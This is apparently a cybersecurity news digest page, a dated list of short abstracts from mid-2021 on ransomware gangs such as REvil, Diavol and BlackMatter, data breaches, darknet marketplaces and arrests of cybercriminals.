Abstract Researchers conducted a new analysis of the Diavol ransomware and found new evidence of the link with the gang behind the TrickBot botnet. In July, researchers from Fortinet reported that a new ransomware family, tracked as Diavol, might have been...

Security Affairs


August 18, 2021

T-Mobile: Hackers stole data of 40 million people Full Text

Abstract T-Mobile said Wednesday that data from 40 million former and prospective customers was compromised by hackers as part of a recent breach of the telecom giant.

The Hill


August 17, 2021

Analysis of Diavol Ransomware Reveals Possible Link to TrickBot Gang Full Text

Abstract The code itself is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. Additionally, it can terminate processes and services as needed.

Security Intelligence


August 16, 2021

Recent attacks on Iran were orchestrated by the Indra group Full Text

Abstract The recent attacks that targeted Iran's transport ministry and national train system were conducted by a threat actor dubbed Indra. In July, Iran's railroad system was hit by a cyberattack in which threat actors published fake messages about delays or cancellations...

Security Affairs


August 16, 2021

Threat actor claims to be selling data of more than 100 million T-Mobile customers Full Text

Abstract T-Mobile is investigating a possible data breach after a threat actor published a post on a forum claiming to be selling the personal data of its customers. New problems for T-Mobile: the company is investigating a possible data breach after that...

Security Affairs


August 14, 2021

Four years after its takedown, AlphaBay marketplace revamped Full Text

Abstract The popular black marketplace AlphaBay is back, four years after law enforcement agencies took down the popular hidden service. The darknet marketplace AlphaBay resurfaced four years after an international operation conducted by law enforcement...

Security Affairs


August 14, 2021

Cybercriminals Reportedly Created Blockchain Analytics Tool Full Text

Abstract The tool was created by one of the same developers behind Incognito Market, a darknet marketplace specializing in the sale of narcotics. Incognito was launched in late 2020, and the marketplace accepts payments in both bitcoin and monero.

DataBreach Today


August 13, 2021

Cyberattackers Embrace CAPTCHAs to Hide Phishing, Malware Full Text

Abstract CAPTCHA-protected malicious URLs are snowballing lately, researchers said.

Threatpost


August 13, 2021

SynAck ransomware gang releases decryption keys for old victims Full Text

Abstract The El_Cometa ransomware gang, formerly known as SynAck, has released today master decryption keys (verified by Michael Gillespie) for the victims they infected between July 2017 and early 2021.

The Record


August 13, 2021

Ransomware Gangs Exploiting Windows Print Spooler Vulnerabilities Full Text

Abstract Ransomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims and spread laterally across a victim's network to deploy file-encrypting payloads on targeted systems. "Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward," Cisco Talos  said  in a report published Thursday, corroborating an  independent analysis  from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea. While Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions.

The Hacker News


August 13, 2021

Microsoft Discovers Cybercriminals Using Morse Code to Evade Detection Full Text

Abstract It’s not very often, though, that cyberattackers turn to Morse Code for operational security. But that's what played a part in a year-long phishing campaign that Microsoft researchers outlined.

Cyberscoop


August 12, 2021

Rogue Marketplace AlphaBay Reboots Full Text

Abstract Illicit underground marketplace relaunches years after takedown.

Threatpost


August 12, 2021

Notorious AlphaBay darknet market comes back to life Full Text

Abstract The AlphaBay darkweb market has come back to life after an administrator of the original project relaunched it over the weekend.

BleepingComputer


August 12, 2021

Cybercrime victims lose an estimated $318 billion annually Full Text

Abstract According to estimates by Comparitech researchers, 71.1 million people fall victim to cybercrime globally each year, which equates to nearly 900 victims per 100,000 people.

Comparitech


August 12, 2021

Magniber Ransomware operators use PrintNightmare exploits to infect Windows servers Full Text

Abstract Threat actors behind the Magniber Ransomware are using PrintNightmare exploits in attacks aimed at Windows servers. Threat actors behind the Magniber Ransomware are exploiting the PrintNightmare flaws (CVE-2021-1675, CVE-2021-34527, and CVE-2021-36958)...

Security Affairs


August 12, 2021

Ransomware gang uses PrintNightmare to breach Windows servers Full Text

Abstract Ransomware operators have added PrintNightmare exploits to their arsenal and are targeting Windows servers to deploy Magniber ransomware payloads.

BleepingComputer


August 12, 2021

European police round up 23 suspected scammers accused of $1.2 million fraud Full Text

Abstract An international police operation resulted in 23 arrests of suspects behind a BEC scheme that last year turned to capitalizing on COVID-19 fears, Europol announced on Wednesday.

Cyberscoop


August 12, 2021

AlphaBay Dark Web Marketplace Claims to be Back in Business Four Years After FBI Seizure Full Text

Abstract The alleged resurrection of AlphaBay, dubbed the Amazon of the dark web, shows how difficult it can be for law enforcement agencies to keep some cybercrime venues shuttered.

Cyberscoop


August 12, 2021

Cybercriminals Use IISerpent Server-side Malware to Manipulate Search Engine Results and Conduct Fraud Full Text

Abstract Contrary to IISpy and IIStealer, IISerpent affects neither the compromised server nor the server’s users. In fact, it ignores all requests coming from legitimate visitors of the compromised sites.

ESET Security


August 11, 2021

Hacker behind biggest cryptocurrency heist ever returns stolen funds Full Text

Abstract The threat actor who hacked Poly Network's cross-chain interoperability protocol yesterday to steal over $600 million worth of cryptocurrency assets is now returning the stolen funds.

BleepingComputer


August 11, 2021

Unhappy Affiliate Spills Conti’s Attack Secrets Full Text

Abstract An affiliate of Conti ransomware leaked the manuals and technical guides, used by the gang to train new members, on a cybercrime forum owing to financial conflicts. The leaked information is said to be the holy grail of the penetration testing team working behind the Conti gang. The files were upl ...

Cyware Alerts - Hacker News


August 11, 2021

Conti Ransomware Group Takes Advantage of Vulnerable Exchange Servers Full Text

Abstract Some patched on-premises Microsoft Exchange email servers are still proving to be vulnerable. Conti ransomware group is now leveraging backdoors that persist, cybersecurity firm Pondurance reports.

Gov Info Security


August 10, 2021

Cybercriminals Attack Cross-Chain DeFi Platform Poly Network and Steal Hundreds of Millions Worth of Crypto Assets Full Text

Abstract Poly Network, a protocol launched by the founder of Chinese blockchain project Neo, operates on the Binance Smart Chain, Ethereum, and Polygon blockchains. This attack struck each chain consecutively.

Coin Desk


August 5, 2021

Researchers Uncover Prometheus Traffic Distribution System Used to Propagate Multiple Malware Campaigns Full Text

Abstract A recently discovered Prometheus traffic distribution system is helping malware and cybercrime gangs distribute their malicious payloads to unsuspecting users using hacked websites.

The Record


August 5, 2021

Prometheus TDS: The $250 service behind recent malware attacks Full Text

Abstract Security researchers investigating multiple malware distribution campaigns found that an underground traffic distribution service called Prometheus is responsible for delivering threats that often lead to ransomware attacks.

BleepingComputer


August 5, 2021

Cybercriminals are manipulating reality to reshape the modern threat landscape Full Text

Abstract Defenders are struggling to counter these complex attacks and gain visibility into new environments, such as the cloud, containers, and business communication applications.

Help Net Security


August 3, 2021

BazaCall Spreading BazaLoader and Ransomware Payloads Again Full Text

Abstract Experts uncovered an attack campaign by BazaLoader operators. These attacks are tricking users into calling a particular phone number, an actual human at a fake call center, to persuade them into downloading malware. The inclusion of the human element has made this threat even more serious.

Cyware Alerts - Hacker News


August 3, 2021

With Crime-as-a-Service, anyone can be an attacker Full Text

Abstract Crime-as-a-Service is the practice of experienced cybercriminals selling access to the tools and knowledge needed to execute cybercrime – in particular, it’s often used to create phishing attacks.

Help Net Security


August 3, 2021

Raccoon Stealer Bundles Malware, Propagates Via Google SEO Full Text

Abstract An update to the stealer-as-a-service platform hides in pirated software, pilfers crypto-coins and installs a software dropper for downloads of more malware.

Threatpost


August 3, 2021

‘DeadRinger’ Targeted Exchange Servers Long Before Discovery Full Text

Abstract Cyberespionage campaigns linked to China attacked telecoms via ProxyLogon bugs, stealing call records and maintaining persistence, as far back as 2017.

Threatpost


August 2, 2021

More evidence suggests that DarkSide and BlackMatter are the same group Full Text

Abstract Researchers found evidence that the DarkSide ransomware gang has rebranded as a new BlackMatter ransomware operation. BleepingComputer found evidence that after the clamorous Colonial Pipeline attack, the DarkSide ransomware gang has rebranded as a new BlackMatter...

Security Affairs


August 2, 2021

Cybercriminals Leak 751GB Data Stolen from Electronic Arts Including Game Source Code, Internal Tools Full Text

Abstract According to a copy of the dump obtained by The Record, the leaked files contain the source code of the FIFA 21 soccer game, including tools to support the company’s server-side services.

The Record


July 31, 2021

BlackMatter ransomware gang rises from the ashes of DarkSide, REvil Full Text

Abstract A new ransomware gang named BlackMatter is purchasing access to corporate networks while claiming to include the best features from the notorious and now-defunct REvil and DarkSide operations.

BleepingComputer


July 30, 2021

Babuk: Biting off More than they Could Chew by Aiming to Encrypt VM and *nix Systems? Full Text

Abstract A recent announcement on their forum indicates that the infamous Babuk ransomware operators are now expressly targeting Linux/UNIX systems, as well as ESXi and VMware systems.

McAfee


July 30, 2021

Estonia's police arrested a Tallinn resident who stole 286K ID scans from a government DB Full Text

Abstract Estonia's police arrested a man from Tallinn who is suspected to be the hacker who stole 286K ID scans from government systems. Estonian police arrested a man from Tallinn who is suspected to have stolen 286,438 ID scans belonging to Estonian citizens...

Security Affairs


July 30, 2021

Arrests made over European ATM ‘jackpotting’ spree Full Text

Abstract Two Belarusian nationals have been arrested in connection with a spate of ATM ‘jackpotting’ attacks in which cash machines across Europe were illegally induced into dispensing €230,000 ($273,000).

The Daily Swig


July 29, 2021

Estonia arrests hacker who stole 286K ID scans from govt database Full Text

Abstract A Tallinn man was arrested a week ago in Estonia under suspicion that he has exploited a government photo transfer service vulnerability to download ID scans of 286,438 Estonians from the Identity Documents Database (KMAIS).

BleepingComputer


July 29, 2021

BlackMatter and Haron, two new ransomware gangs in the threat landscape Full Text

Abstract The cyber threat landscape changes continuously; recently two new ransomware-as-a-service (RaaS) operations named BlackMatter and Haron made the headlines. Recently, two new ransomware gangs, named BlackMatter and Haron, announced the beginning of their operations. The...

Security Affairs


July 29, 2021

DoppelPaymer ransomware gang rebrands as the Grief group Full Text

Abstract After a period of little to no activity, the DoppelPaymer ransomware operation has made a rebranding move, now going by the name Grief (a.k.a. Pay or Grief).

BleepingComputer


July 29, 2021

New Ransomware Gangs — Haron and BlackMatter — Emerge on Cybercrime Forums Full Text

Abstract Two new ransomware-as-a-service (RaaS) programs have appeared on the threat radar this month, with one group professing to be a successor to DarkSide and REvil, the two infamous ransomware syndicates that went off the grid following major attacks on Colonial Pipeline and Kaseya over the past few months. "The project has incorporated in itself the best features of DarkSide, REvil, and LockBit," the operators behind the new BlackMatter group said in their darknet public blog, making promises to not strike organizations in several industries, including healthcare, critical infrastructure, oil and gas, defense, non-profit, and government sectors. According to Flashpoint, the BlackMatter threat actor registered an account on Russian-language forums XSS and Exploit on July 19, quickly following it up with a post stating they are looking to purchase access to infected corporate networks comprising anywhere between 500 and 15,000 hosts in the U.S., Canada, Australia, and the U.

The Hacker News


July 29, 2021

Cybercriminals Sell Data of Unknown Number of British Columbians Stolen from Homewood Health Full Text

Abstract CTV News has confirmed at least some of the information leaked online is authentic, though the bulk of the data is still on the auction block at Marketo, a leaked data marketplace.

CTV News


July 28, 2021

BlackMatter ransomware group claims to be Darkside and REvil successor Full Text

Abstract The BlackMatter ransomware gang, a new threat actor, has appeared in the threat landscape and claims to combine the TTPs of Darkside and REvil. BlackMatter is a new ransomware gang that started its activity this week; the cybercriminal group claims to be the successor...

Security Affairs


July 25, 2021

Threat actor offers Clubhouse secret database containing 3.8B phone numbers Full Text

Abstract A threat actor is offering for sale on hacking forums the secret Clubhouse database containing 3.8B phone numbers. Clubhouse is a social audio app for iOS and Android where users can communicate in voice chat rooms that accommodate groups of thousands...

Security Affairs


July 24, 2021

AvosLocker enters the ransomware scene, asks for partners Full Text

Abstract Avos is a relatively new ransomware that was observed in late June and early July. Its authors announced recruitment for "pentesters with Active Directory network experience" and "access brokers."

Malwarebytes Labs


July 23, 2021

Dutch Police Arrest Two Hackers Tied to “Fraud Family” Cybercrime Ring Full Text

Abstract Law enforcement authorities in the Netherlands have arrested two individuals allegedly belonging to a Dutch cybercriminal collective who were involved in developing, selling, and renting sophisticated phishing frameworks to other threat actors in what's known as a "Fraud-as-a-Service" operation. The apprehended suspects, a 24-year-old software engineer and a 15-year-old boy, are said to have been the main developer and seller of the phishing frameworks that were employed to collect login data from bank customers. The attacks primarily singled out users in the Netherlands and Belgium. Believed to be active since at least 2020, the cybercriminal syndicate has been codenamed "Fraud Family" by cybersecurity firm Group-IB. The frameworks come with phishing kits, tools designed to steal information, and web panels, which allow the fraudsters to interact with the actual phishing site in real time and retrieve the stolen user data. "The phishing frameworks a

The Hacker News


July 22, 2021

Ransomware gang breached CNA’s network via fake browser update Full Text

Abstract Leading US insurance company CNA Financial has provided a glimpse into how Phoenix CryptoLocker operators breached its network, stole data, and deployed ransomware payloads in a ransomware attack that hit its network in March 2021.

BleepingComputer


July 22, 2021

FBI: Cybercriminals Eyeing Broadcast Disruption at Tokyo Olympics Full Text

Abstract Expected cyberattacks on Tokyo Olympics likely include attempts to hijack video feeds, the Feds warn.

Threatpost


July 22, 2021

Group-IB helps Dutch police identify members of phishing developer gang Fraud Family Full Text

Abstract Researchers from threat intelligence firm Group-IB helped Dutch police identify members of the phishing developer gang known as Fraud Family. Group-IB, one of the leading providers of solutions dedicated to detecting and preventing cyberattacks, identifying...

Security Affairs


July 22, 2021

Another Hacker Arrested for 2020 Twitter Hack and Massive Bitcoin Scam Full Text

Abstract A U.K. citizen has been arrested in the Spanish town of Estepona over his alleged involvement in the July 2020 hack of Twitter, resulting in the compromise of 130 high-profile accounts. Joseph O'Connor , 22, has been  charged  with intentionally accessing a computer without authorization and obtaining information from a protected computer, as well as for making extortive communications. The Spanish National Police made the arrest pursuant to a U.S. warrant. Besides his role in the Twitter hack, O'Connor is also charged with computer intrusions related to takeovers of TikTok and Snapchat user accounts and cyberstalking an unnamed juvenile victim. The  great Twitter hack  of July 15, 2020, emerged as one of the biggest security lapses in the social media platform's history after O'Connor, along with  Mason Sheppard, Nima Fazeli, and Graham Ivan Clark , managed to gain access to Twitter's internal tools, abusing it to breach the accounts of politicians, celebritie

The Hacker News


July 21, 2021

TikTok, Snapchat account hijacker arrested for role in Twitter hack Full Text

Abstract A fourth suspect has been arrested today for his role in the Twitter hack last year that gave attackers access to the company's internal network exposing high-profile accounts to hijacking.

BleepingComputer


July 21, 2021

REvil’s Gone But its Technique is Relevant Full Text

Abstract McAfee Labs described the use of DLL sideloading in REvil’s attacks after the group made a sudden exit that surprised everyone. Generally, this technique is used by APT groups to avoid raising any flags on security radars.

Cyware Alerts - Hacker News


July 20, 2021

These are the Top Favorite CVEs of Cybercriminals Full Text

Abstract An analysis of criminal forums, in which experts studied 15 cybercrime forums from January 2020 to March 2021, reveals attackers' favorite CVEs. According to the analysis, most of the CVEs discussed were exploited by both nation-state hackers and cybercriminals. At the least, organizations must locate these flaws a ...

Cyware Alerts - Hacker News


July 19, 2021

Justice Department Charges Four Chinese Nationals Working for Global Intrusion Campaign Full Text

Abstract On July 16, the Department of Justice unsealed a grand jury indictment

Lawfare


July 19, 2021

More Ransomware Gangs Use VMs to Obscure Attacks Full Text

Abstract Ransomware operators are continually refining their tactics in a bid to evade detection. This has led to a growing number of attackers relying on Virtual Machines (VMs) to run their ransomware payloads on compromised computers.

Cyware Alerts - Hacker News


July 19, 2021

HelloKitty Joins the Race of Ransomware Targeting VMware ESXi Servers Full Text

Abstract HelloKitty ransomware actors were spotted leveraging a Linux variant to target VMware's ESXi servers and virtual machines running on the platform. The notorious ransomware gang gained popularity after targeting the Polish gaming firm CD Projekt. Organizations using such servers should implement hig ...

Cyware Alerts - Hacker News


July 18, 2021

HelloKitty ransomware gang targets vulnerable SonicWall devices Full Text

Abstract BleepingComputer became aware that the recent wave of attacks targeting vulnerable SonicWall devices was carried out by HelloKitty ransomware operators. SonicWall this week has issued an urgent security alert to warn companies of “an imminent ransomware...

Security Affairs


July 17, 2021

Mespinoza Group Uses Unique Tools to Target Organizations Full Text

Abstract Palo Alto Networks provides details about the methods and tactics employed by the Mespinoza ransomware group that has been targeting multiple sectors across the globe with a focus on the education sector. The ransomware group gains initial access via public-facing RDP servers and prefers ...

Cyware Alerts - Hacker News


July 17, 2021

US government launches plans to cut cybercriminals off from cryptocurrency Full Text

Abstract The updates on the White House's plan to tackle ransomware come on the heels of the third major ransomware attack to pose a serious threat to U.S. national security in as many months.

Cyberscoop


July 16, 2021

Hacker is stealing the identities of victims, Surfside mayor says Full Text

Abstract Surfside Mayor Charles Burkett said Friday that a hacker is stealing the identities of victims who died in the condominium collapse in his city. 

The Hill


July 16, 2021

Top CVEs Trending with Cybercriminals Full Text

Abstract An analysis of criminal forums reveals which publicly known vulnerabilities attackers are most interested in.

Threatpost


July 15, 2021

Cybercriminals customizing malware for attacks on virtual infrastructure Full Text

Abstract As per research by Positive Technologies, the number of attacks increased by 17% compared to Q1 2020, with 77% being targeted attacks, and incidents with individuals accounting for 12% of the total.

Help Net Security


July 15, 2021

Spain arrests 16 for distributing the Mekotio and Grandoreiro banking trojans Full Text

Abstract The suspects were arrested last week, had their homes searched, and had devices seized for investigation during raids that were part of an operation authorities named Aguas Vivas (Living Waters).

The Record


July 14, 2021

Watch Out! Cybercriminals are Hitting Hard at Cryptocurrency Users Full Text

Abstract Illicit cryptomining campaigns are growing strong as cybercriminals continue to evolve their attack techniques and malware. One of the main reasons for the rise is the rapidly growing investments in the cryptocurrency space.

Cyware Alerts - Hacker News


July 14, 2021

Hancitor is Using Old but Tested Tricks to Spread Malware Full Text

Abstract McAfee Labs laid bare a new technique used by Hancitor actors that involves the use of cookies to prevent URL scraping, as well as the dropping of malware such as CobaltStrike, Pony, Cuba, FickerStealer, and Zeppelin. Experts believe that it is expected to be used in future ransomware attacks and suggest erecting ...

Cyware Alerts - Hacker News


July 14, 2021

Cybercriminals took advantage of WFH to target financial services companies, says Financial Stability Board report Full Text

Abstract Criminals targeted security gaps at financial services firms as their staff moved to working from home, according to a report issued by the Financial Stability Board (FSB) on Tuesday.

The Register


July 14, 2021

16 Cybercriminals Behind Mekotio and Grandoreiro Banking Trojan Arrested in Spain Full Text

Abstract Spanish law enforcement agencies on Wednesday arrested 16 individuals belonging to a criminal network in connection with operating two banking trojans as part of a social engineering campaign targeting financial institutions in Europe. The arrests were made in Ribeira (A Coruña), Madrid, Parla and Móstoles (Madrid), Seseña (Toledo), Villafranca de los barros (Badajoz), and Aranda de Duero (Burgos) following a year-long investigation, the Civil Guard said in a statement. "Through malicious software, installed on the victim's computer by the technique known as 'email spoofing', [the group] would have managed to divert large amounts of money to their accounts," authorities  noted . Computer equipment, mobile phones, and documents were confiscated, and more than 1,800 spam emails were analyzed, enabling law enforcement to block transfer attempts totaling €3.5 million successfully. The campaign is said to have netted the actors €276,470, of which €87,000 has been

The Hacker News


July 14, 2021

REvil Ransomware Gang Mysteriously Disappears After High-Profile Attacks Full Text

Abstract REvil, the infamous ransomware cartel behind some of the biggest cyberattacks targeting JBS and Kaseya, has mysteriously disappeared from the dark web, leading to speculations that the criminal enterprise may have been taken down. Multiple darknet and clearnet sites maintained by the Russia-linked cybercrime syndicate, including the data leak, extortion, and payment portals, remained inaccessible, displaying an error message "Onionsite not found."  The group's  Tor network infrastructure  on the dark web consists of one data leak blog site and 22 data hosting sites. It's not immediately clear what prompted the infrastructure to be knocked offline. REvil is one of the most prolific ransomware-as-a-service (RaaS) groups that first appeared on the threat landscape in April 2019. It's an evolution of the  GandCrab  ransomware, which hit the underground markets in early 2018. "If REvil has been permanently disrupted, it'll mark the end of a group which ha

The Hacker News


July 14, 2021

Cybercriminals Using Marvel’s Black Widow Movie to Spread Malware and Steal Payment Card Data Full Text

Abstract According to Kaspersky, several Black Widow-themed phishing sites are operating to steal user credentials. One of the sites promised the users an early preview of the movie to lure users.

Hackread


July 14, 2021

Ransom Negotiation and Data Leak Sites Operated by Attackers Behind Kaseya Hack Go Down Full Text

Abstract The ransomware hacker gang REvil’s websites are offline, about a week and a half after its attack on IT software vendor Kaseya allowed the criminals to breach hundreds of companies around the world.

Politico


July 13, 2021

Ransomware Giant REvil’s Sites Disappear Full Text

Abstract Just days after President Biden demanded that Russian President Putin shut down ransomware groups, the servers of one of the biggest groups mysteriously went dark.

Threatpost


July 13, 2021

REvil ransomware gang’s web sites mysteriously shut down Full Text

Abstract The infrastructure and websites for the REvil ransomware operation have mysteriously gone offline as of last night.

BleepingComputer


July 13, 2021

Cybercriminals steal millions in stolen crypto through scam impersonating Coinbase Full Text

Abstract An investigation by CyberNews uncovered a network of crypto wallet addresses used by a scammer group to store and cash out millions in crypto stolen from thousands of victims.

Cyber News


July 13, 2021

Scammers Poured Themselves a Glass and Got to Work on Wine-Themed Phishing Emails in 2020 Full Text

Abstract 2020 saw rising wine sales and digital scams to match. Researchers at Recorded Future and Area 1 Security witnessed an increase in wine-themed domain registrations and phishing emails since March.

Security Intelligence


July 13, 2021

Eight arrests made as Eurojust dismantles $2.4 million e-commerce fraud operation Full Text

Abstract The criminal network deployed phishing scams to dupe victims into paying for what they believed were goods and services via legitimate websites, including eBay, Amazon, and Airbnb.

The Daily Swig


July 12, 2021

Bandidos Targeting Latin America, Spying on Victims Full Text

Abstract ESET researchers took the wraps off an ongoing espionage campaign targeting corporate networks in Spanish-speaking countries, with a focus on Venezuela. The modifications made to this malware over the years show a keen interest of the Bandidos cybercriminals in continuing to use this malware in future campa ...

Cyware Alerts - Hacker News


July 10, 2021

How REvil evolved into a ransomware collective capable of extorting Kaseya, JBS Full Text

Abstract Before claiming responsibility for a breach at the software company Kaseya, the group accounted for less than 10% of known ransomware victims, according to the threat intelligence firm Recorded Future. Now, it accounts for 42%.

Cyberscoop


July 9, 2021

Operation Lyrebird - Unfolding the Secrets of Dr HeX Full Text

Abstract INTERPOL arrested Dr HeX under Operation Lyrebird. The accused was involved in attacks on 134 websites from 2009 to 2018 across multiple regions. This arrest comes as a breath of fresh air for the security community. The suspect is under investigation and more details may emerge in the futur ...

Cyware Alerts - Hacker News


July 8, 2021

Hacker deposited $1M in a popular cybercrime marketplace to buy zero-day exploits Full Text

Abstract A threat actor who goes by the name “integra” has deposited 26.99 Bitcoins on a cybercrime forum with the aim of purchasing zero-day exploits from other forum members.

Security Affairs


July 08, 2021

SideCopy Hackers Target Indian Government Officials With New Malware Full Text

Abstract A cyber-espionage group has been observed increasingly targeting Indian government personnel as part of a broad campaign to infect victims with as many as four new custom remote access trojans (RATs), signaling a "boost in their development operations." Attributed to a group tracked as SideCopy, the intrusions culminate in the deployment of a variety of modular plugins, ranging from file enumerators to browser credential stealers and keyloggers (Xeytan and Lavao), Cisco Talos said in a report published Wednesday. "Targeting tactics and themes observed in SideCopy campaigns indicate a high degree of similarity to the Transparent Tribe APT (aka APT36) also targeting India," researchers Asheer Malhotra and Justin Thattil said. "These include using decoys posing as operational documents belonging to the military and think tanks and honeytrap-based infections." First documented in September 2020 by Indian cybersecurity firm Quick Heal, SideCopy has a

The Hacker News


July 7, 2021

SideCopy cybercriminals use new custom Trojans in attacks against India’s military Full Text

Abstract Cisco Talos said a recent surge in activity signals a boost in the APT's development of techniques, tactics, and tools, with multiple, new remote access trojans (RATs) and plugins now in play.

ZDNet


July 7, 2021

Researchers uncovered the network infrastructure of REvil – The notorious ransomware group that hit Kaseya Full Text

Abstract Resecurity's HUNTER cyber threat intelligence and R&D unit identified a strong connection to a cloud hosting and IoT company servicing a domain belonging to the cybercriminals. According to recent research published by Resecurity on Twitter,...

Security Affairs


July 7, 2021

US: We May Take Unilateral Action Against Russian Cyber-Criminals Full Text

Abstract White House says option remains if Kremlin doesn’t act

Infosecurity Magazine


July 6, 2021

Suspected Cyber-Criminal “Dr Hex” Tracked Down Via Phishing Kit Full Text

Abstract Group-IB researchers also benefitted from poor threat actor OpSec

Infosecurity Magazine


July 6, 2021

REvil Group Demands $70 Million for ‘Universal Decryptor’ Full Text

Abstract Researchers have detected 5000 attack attempts since July 2

Infosecurity Magazine


July 06, 2021

Hackers reportedly lower ransom demand to restore data to $50M Full Text

Abstract The Russia-linked ransomware gang known as REvil has reportedly lowered the amount of money it is willing to accept in exchange for data belonging to hundreds of companies worldwide that it is holding hostage.

The Hill


July 06, 2021

Interpol Arrests Moroccan Hacker Engaged in Nefarious Cyber Activities Full Text

Abstract Law enforcement authorities with Interpol have apprehended a threat actor responsible for targeting thousands of unwitting victims over several years and staging malware attacks on telecom companies, major banks, and multinational corporations in France as part of a global phishing and credit card fraud scheme. The two-year investigation, dubbed Operation Lyrebird by the international, intergovernmental organization, resulted in the arrest of a Moroccan citizen nicknamed Dr HeX, cybersecurity firm Group-IB disclosed today in a report shared with The Hacker News. Dr HeX is said to have been "active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims," the cybersecurity firm said. The cyber attacks involved deploying a phishing kit consisting of web pages that spoofed banking entities in the country, followed by sending mass emails

The Hacker News


July 6, 2021

Operation Lyrebird: Group-IB assists INTERPOL in identifying suspect behind numerous cybercrimes worldwide Full Text

Abstract Group-IB supported INTERPOL in Operation Lyrebird, which made it possible to identify a threat actor presumably responsible for multiple attacks. Group-IB, one of the leading providers of solutions dedicated to detecting and preventing cyberattacks,...

Security Affairs


July 6, 2021

Moroccan hacker Dr HeX arrested for phishing attacks, malware distribution Full Text

Abstract Moroccan authorities arrested a hacker known as “Dr HeX” for allegedly conducting website defacement, phishing attacks, and malware distribution over 12 years, Interpol announced.

The Record


July 5, 2021

Diavol Ransomware’s Connection with Wizard Spider Revealed Full Text

Abstract FortiGuard Labs associated Diavol ransomware with the Russian Wizard Spider threat actor. Researchers observed Diavol and Conti payloads being used in ransomware attacks targeting different systems in early June. The connection of the ransomware to already established cybercrime groups shows how ...

Cyware Alerts - Hacker News


July 5, 2021

Ransomware Gangs Creating Their Own Websites to Promote Their Businesses Full Text

Abstract Two ransomware gangs, Himalaya and LockBit, were found promoting their encryption tools on their own sites after the recent ban of ransomware ads on well-known Russian-speaking cybercrime forums. To attract affiliates, the LockBit developers claim to offer the fastest encryption and file-stealing (StealBit) ...

Cyware Alerts - Hacker News


July 05, 2021

REvil ransomware asks $70 million to decrypt all Kaseya attack victims Full Text

Abstract REvil ransomware has set a price for decrypting all systems locked during the Kaseya supply-chain attack. The gang wants $70 million in Bitcoin for the tool that allows all affected businesses to recover their files.

BleepingComputer


July 5, 2021

REvil ransomware gang hit Spanish telecom giant MasMovil Full Text

Abstract The REvil ransomware gang hit Spanish telecom giant MasMovil and claims to have stolen sensitive data from the group. MasMovil is one of the largest Spanish telecom operators; last week the group was hit by the REvil ransomware gang, which claims to have...

Security Affairs


July 04, 2021

REvil is increasing ransoms for Kaseya ransomware attack victims Full Text

Abstract The REvil ransomware gang is increasing the ransom demands for victims encrypted during Friday's Kaseya ransomware attack.

BleepingComputer


July 4, 2021

REvil gang exploited a zero-day in the Kaseya supply chain attack Full Text

Abstract Kaseya was addressing the zero-day vulnerability that the REvil ransomware gang exploited to breach on-premises Kaseya VSA servers. A new supply chain attack made the headlines: on Friday the REvil ransomware gang hit the Kaseya cloud-based MSP platform...

Security Affairs


July 4, 2021

Hackers spread backdoor after compromising the Mongolian CA MonPass Full Text

Abstract Threat actors compromised the servers of Mongolian certificate authority (CA) MonPass and used its website to spread malware.

Security Affairs


July 3, 2021

Kaseya VSA criminals may have ‘weaponized’ links in ransom negotiations Full Text

Abstract Ransomware attacks leveraging a zero-day in the on-premises Kaseya VSA remote IT management product started Friday afternoon and struck dozens of managed service providers and thousands of those MSPs' customers. As one cyber expert noted: “I don’t think I have seen a ransomware gang use a 0-Day in an attack before.”

SCMagazine


July 2, 2021

Revisiting a Framework on Military Takedowns Against Cybercriminals Full Text

Abstract The U.S. military’s mission is not to carry out military operations. Its mission is to defend the nation. Cyberspace offers the military an incredibly useful capability to advance national security. Cybersecurity is national security.

Lawfare


July 2, 2021

Research partnership to examine how fraudsters abuse financial tech innovations Full Text

Abstract Federal Reserve Bank of Atlanta and GSU team will study P2P and mobile payments, e-wallets, and central bank digital currencies.

SCMagazine


July 01, 2021

Trickbot cybercrime group linked to new Diavol ransomware Full Text

Abstract FortiGuard Labs security researchers have linked a new ransomware strain dubbed Diavol to Wizard Spider, the cybercrime group behind the Trickbot botnet.

BleepingComputer


July 01, 2021

VirusTotal ordered to reveal private info of stolen HSE data downloaders Full Text

Abstract An Irish court has ordered VirusTotal to provide the information of subscribers who downloaded or uploaded confidential data stolen from Ireland's national health care service during a ransomware attack.

BleepingComputer


June 30, 2021

Hacker Wanted in the U.S. for Spreading Gozi Virus Arrested in Colombia Full Text

Abstract Colombian authorities on Wednesday said they have arrested a Romanian hacker who is wanted in the U.S. for distributing a virus that infected more than a million computers from 2007 to 2012. Mihai Ionut Paunescu (aka "Virus"), the individual in question, was detained at the El Dorado airport in Bogotá, the Office of the Attorney General of Colombia said. Paunescu was previously charged by the U.S. Department of Justice (DoJ) in January 2013 for operating a bulletproof hosting service that "enabled cyber criminals to distribute the Gozi Virus, the Zeus Trojan and other notorious malware, and conduct other sophisticated cyber crimes." He was arrested in Romania in December 2012 but managed to avoid extradition to the U.S. "Through this service, Paunescu, like other bulletproof hosts, knowingly provided critical online infrastructure to cyber criminals that allowed them to commit online criminal activity with little fear of detection by law enforcement,

The Hacker News


June 30, 2021

Colombian authorities arrested hacker behind the Gozi Virus Full Text

Abstract Colombian authorities arrested Mihai Ionut Paunescu, a Romanian hacker wanted in the U.S. for distributing the Gozi virus, which infected more than a million computers.

Security Affairs


June 30, 2021

Authorities Seize DoubleVPN Service Used by Cybercriminals Full Text

